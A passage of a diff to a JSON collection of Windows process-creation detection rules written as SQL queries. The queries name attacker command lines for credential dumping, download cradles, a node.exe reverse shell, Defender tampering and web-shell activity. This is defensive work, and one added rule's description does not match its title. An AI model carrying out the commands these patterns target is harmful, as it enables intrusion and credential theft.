ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", - "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", - "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "status": "experimental", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * 
FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "status": "experimental", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND 
CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", "status": "stable", - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", - "author": "frack113", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "status": "experimental", + "description": "Detects a remote file copy attempt to a 
hidden network share. This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", "tags": [ - "attack.collection", - "attack.t1005" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ - "Unknown" + "Other programs that cause these patterns (please report)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "status": "test", + "description": "Detects PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND 
CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. 
For example to establish reverse shell as seen in Log4j attacks...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_node_abuse.yml" - }, - { - "title": "Suspicious Desktopimgdownldr Command", - "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 
'%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", - "status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" - ], + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "status": "experimental", + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE 
'\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + "filename": "proc_creation_win_susp_download_office_domain.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af 
%' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE 
'\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Disable Important Scheduled Task", - "id": 
"9ac94dc8-9042-493c-ba45-3b5e7c86b980", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "status": "test", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": 
"07f8bdc2-c9b3-472a-9817-5a670b872f53", - "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": "test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.005" + "attack.t1003.002" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_hktl_pypykatz.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", - "status": "test", - "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. 
